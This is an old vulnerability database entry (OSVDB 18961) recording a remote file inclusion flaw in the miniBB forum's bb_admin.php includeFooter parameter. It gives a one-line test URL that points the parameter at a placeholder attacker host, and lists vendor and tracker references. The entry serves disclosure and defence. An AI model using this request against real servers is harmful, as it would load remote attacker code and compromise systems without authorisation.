miniBB bb_admin.php includeFooter Variable Remote File Inclusion

2005-08-16T04:43:23
ID OSVDB:18961
Type osvdb
Reporter OSVDB
Modified 2005-08-16T04:43:23

Description

Manual Testing Notes

http://[target]/[path_to_minibb]/bb_admin.php?includeFooter=http://[attacker]

References:

Vendor URL: http://www.minibb.net/ Security Tracker: 1014715